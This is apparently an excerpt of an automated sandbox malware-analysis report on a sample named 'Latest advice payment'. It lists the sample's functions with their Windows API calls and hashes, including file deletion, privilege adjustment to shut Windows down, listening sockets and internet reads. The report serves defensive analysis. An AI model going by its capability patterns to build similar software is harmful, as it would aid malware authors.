                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                              • Part of subcall function 005C4A31: GetFileAttributesW.KERNEL32(?,005C370B), ref: 005C4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 005C3B89
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 005C3BD9
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005C3BEA
                                                            • FindClose.KERNEL32(00000000), ref: 005C3C01
                                                            • FindClose.KERNEL32(00000000), ref: 005C3C0A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: a27dc153fea4d319a2230993efaa271d300679e424e075cc7cbdbcc3a684f110
                                                            • Instruction ID: 22fef488c503b2d03e50b9760cb35fa73c6b914e1c218ea44f134132f8f8a867
                                                            • Opcode Fuzzy Hash: a27dc153fea4d319a2230993efaa271d300679e424e075cc7cbdbcc3a684f110
                                                            • Instruction Fuzzy Hash: F8317E3100838A9FC304EB64C895DAFBBA8BEA5304F404E2DF4D593191EB209E08CB97
                                                            Function 005C51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005B87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005B882B
                                                              • Part of subcall function 005B87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005B8858
                                                              • Part of subcall function 005B87E1: GetLastError.KERNEL32 ref: 005B8865
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 005C51F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: 89bcea6adce24ba47f41c2624399508b7cb3bb2209e9b597050bc6913094366e
                                                            • Instruction ID: 5a19bca6a1e5ddce69da626bdf39168167589202a68da5582a76a1803c7d9869
                                                            • Opcode Fuzzy Hash: 89bcea6adce24ba47f41c2624399508b7cb3bb2209e9b597050bc6913094366e
                                                            • Instruction Fuzzy Hash: 8C01D8396916115FE72852E89C8EFBA7ADCF744350F540829F953D60D2F9513C809590
                                                            Function 005D6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005D62DC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D62EB
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 005D6307
                                                            • listen.WSOCK32(00000000,00000005), ref: 005D6316
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D6330
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 005D6344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: a36a8f4c837807c7522f916c31b5078c3a038295956c08fe2b7f6885cdeeeb85
                                                            • Instruction ID: ed707d69dc36e5899382f8a59fcc996e1a51e04286a85ad70171de112cb51747
                                                            • Opcode Fuzzy Hash: a36a8f4c837807c7522f916c31b5078c3a038295956c08fe2b7f6885cdeeeb85
                                                            • Instruction Fuzzy Hash: F021E6756002159FCB10EF68C889B6EBBA9FF88310F14455AF856973D1CB70AD05DB51
                                                            Function 00575520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00580DB6: std::exception::exception.LIBCMT ref: 00580DEC
                                                              • Part of subcall function 00580DB6: __CxxThrowException@8.LIBCMT ref: 00580E01
                                                            • _memmove.LIBCMT ref: 005B0258
                                                            • _memmove.LIBCMT ref: 005B036D
                                                            • _memmove.LIBCMT ref: 005B0414
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: 59cdeb0e0bd119e5d7f56f70025f6319718e269f6440b6c9c07c7535bdda415e
                                                            • Instruction ID: 546253ac3adfba8b7cdc08851852458a29c52788fe40b196de8de04834adfbb2
                                                            • Opcode Fuzzy Hash: 59cdeb0e0bd119e5d7f56f70025f6319718e269f6440b6c9c07c7535bdda415e
                                                            • Instruction Fuzzy Hash: 9802B170A0020ADBCF04DF64D985AAEBFF5FF84300F148469E80ADB295EB75E954CB91
                                                            Function 00561287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 005619FA
                                                            • GetSysColor.USER32(0000000F), ref: 00561A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00561A61
                                                              • Part of subcall function 00561290: DefDlgProcW.USER32(?,00000020,?), ref: 005612D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 7454d296f906d40ab1ef06bb5c720b5bc1787f328db5203b732ccfc0111eadc4
                                                            • Instruction ID: 6d692f71765441cae0eea459850f6905be13af0ed8b5bf89c2e0cefbb8d5ffde
                                                            • Opcode Fuzzy Hash: 7454d296f906d40ab1ef06bb5c720b5bc1787f328db5203b732ccfc0111eadc4
                                                            • Instruction Fuzzy Hash: 0BA18971112D85BEFB38AB799D48D7F2E5DFB82346B1C051AF002C7192CA249D01D2FA
                                                            Function 005D6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005D7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005D7DB6
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 005D679E
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D67C7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 005D6800
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D680D
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 005D6821
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: c047ada1a00ea1815f9d867ce4bfc0c2358f4ef40c1ce36ed01a90cc712ff88f
                                                            • Instruction ID: f39fca58d60bd05de24ad38ea32671f886bbf99dae6216596e9423ae3be0e42e
                                                            • Opcode Fuzzy Hash: c047ada1a00ea1815f9d867ce4bfc0c2358f4ef40c1ce36ed01a90cc712ff88f
                                                            • Instruction Fuzzy Hash: 4141E375A00215AFDB20AF688C8AF7E7BE8FB98714F048559F955AB3C2CA709D018791
                                                            Function 005E5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 85df868971bc72fdd09a7687f938b72c5c9ee28f177844fc289313f4e8c42c29
                                                            • Instruction ID: c9a72fbe57d13914f1c10596eb5cd448a4f497620c7b5805eb3deedf08174a67
                                                            • Opcode Fuzzy Hash: 85df868971bc72fdd09a7687f938b72c5c9ee28f177844fc289313f4e8c42c29
                                                            • Instruction Fuzzy Hash: 4111E6717005515BEB245F279C88A6A7F98FF983A5B404839F885D7241DF709C018BA0
                                                            Function 005B80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005B80C0
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005B80CA
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005B80D9
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005B80E0
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005B80F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 6561318025cef81178068eef824c43decb543a91b30a26fc3f88834a40a61e93
                                                            • Instruction ID: 5b9e75afee06ff5dff8a33ab951599f1579c943c8a2b92ebb8e81894e7083b4c
                                                            • Opcode Fuzzy Hash: 6561318025cef81178068eef824c43decb543a91b30a26fc3f88834a40a61e93
                                                            • Instruction Fuzzy Hash: B7F04431241244AFD7144F65DCCDEB73FACFF89755B000025F545C6150CE619D45EB60
                                                            Function 0056E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ddb$Ddb$Ddb$Ddb$Variable must be of type 'Object'.
                                                            • API String ID: 0-1193501972
                                                            • Opcode ID: 954b5e3ab2e8e27692984f1ec7577c725ab55b49dc2cd5462dca0903b621fed1
                                                            • Instruction ID: 5b4a5aea0bc52817bacbd63e706266e112f8ed90b642e85461769eb34a645d7d
                                                            • Opcode Fuzzy Hash: 954b5e3ab2e8e27692984f1ec7577c725ab55b49dc2cd5462dca0903b621fed1
                                                            • Instruction Fuzzy Hash: A7A29078A01215CFCB24CF98C485AAEBFB6FF59314F248469E905AB351D771ED82CB90
                                                            Function 005CC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 005CC432
                                                            • CoCreateInstance.OLE32(005F2D6C,00000000,00000001,005F2BDC,?), ref: 005CC44A
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • CoUninitialize.OLE32 ref: 005CC6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 58eb3dea2ba026d68c595ee0e81394e0862bb7bdbc0f639d984237371399e8a1
                                                            • Instruction ID: 0d3f913c91393890ad61b276fe8b183528ee26f79c4575243bae44d05a9b1c36
                                                            • Opcode Fuzzy Hash: 58eb3dea2ba026d68c595ee0e81394e0862bb7bdbc0f639d984237371399e8a1
                                                            • Instruction Fuzzy Hash: A0A11AB1104206AFD700EF54C895EABBBECFFD9354F00491CF1959B192EB71AA49CB52
                                                            Function 00564B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00564AD0), ref: 00564B45
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00564B57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: ff73d3a8cad4aff0e59ffec7cf79c2400608998be05306063235c250ddc16019
                                                            • Instruction ID: 32abbb5ff2a29f9240db311423f18496ab2a09eab49e675c1e0dd154f7a14f61
                                                            • Opcode Fuzzy Hash: ff73d3a8cad4aff0e59ffec7cf79c2400608998be05306063235c250ddc16019
                                                            • Instruction Fuzzy Hash: 21D01234A10757CFDB289F32D858B067AD8BF55351B11C83D94C5DA160DA70D4C0CB54
                                                            Function 005DEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 005DEE3D
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 005DEE4B
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 005DEF0B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 005DEF1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 8e206a880be93cd8fb6a29f41a38ddb826ded59850e85f0cad2243a4790d943f
                                                            • Instruction ID: 79bda13aba78f302329f1ce94870c5471cced564a604261f36d59ef90b833cdc
                                                            • Opcode Fuzzy Hash: 8e206a880be93cd8fb6a29f41a38ddb826ded59850e85f0cad2243a4790d943f
                                                            • Instruction Fuzzy Hash: D2518171504316AFD320EF24C886E6BBBE8FFD4710F50491EF595972A1EB709904CB92
                                                            Function 005BE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005BE628
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: f53e394cd4a1090e3486445e977075cbeb21a162645df92994e71a7ff96e048e
                                                            • Instruction ID: 85349022936549a703e76ec587e5b9b29c73471bfa1e7cf8f968c9b65c45140b
                                                            • Opcode Fuzzy Hash: f53e394cd4a1090e3486445e977075cbeb21a162645df92994e71a7ff96e048e
                                                            • Instruction Fuzzy Hash: 46322575A007059FD728DF19D4829AABBF1FF48310B15C56EE89ADB3A1EB70E941CB40
                                                            Function 005D22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,005D180A,00000000), ref: 005D23E1
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 005D2418
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: a741341949bc5caa9d2edca337740294d7a52002eca83278ad8dc6173112dde6
                                                            • Instruction ID: 5a7b00049e1b79793ddefd65027bcb6d1568d0a50919e7f7075d714832c01405
                                                            • Opcode Fuzzy Hash: a741341949bc5caa9d2edca337740294d7a52002eca83278ad8dc6173112dde6
                                                            • Instruction Fuzzy Hash: 6E41B471904209BFEF30DE99DC85EBBBBACFB90314F10446BFA41A6240EA759E459760
                                                            Function 005CB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 005CB343
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 005CB39D
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 005CB3EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: d623fa811e4e8dfd26a1f123c6f72b6c9355f0a54bd5e3a725ce4a2a1530aa72
                                                            • Instruction ID: 030daf0de168d844951030dd31c982d985e900b9a1fe428ae048eb89827cf7a3
                                                            • Opcode Fuzzy Hash: d623fa811e4e8dfd26a1f123c6f72b6c9355f0a54bd5e3a725ce4a2a1530aa72
                                                            • Instruction Fuzzy Hash: 31216075A00509EFCB00EFA5D885EEDBFB8FF89310F1480A9E945AB351DB31A915CB51
                                                            Function 005B87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00580DB6: std::exception::exception.LIBCMT ref: 00580DEC
                                                              • Part of subcall function 00580DB6: __CxxThrowException@8.LIBCMT ref: 00580E01
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005B882B
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005B8858
                                                            • GetLastError.KERNEL32 ref: 005B8865
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: cf5aae26db3b0426f7bdab33ddfbf2f6047260d23d423caaf6e7371eefa03124
                                                            • Instruction ID: 8f3c753421e990bc07eb4d3ec989a5bfecc9ef410aa36d15f0ed624f4f346a66
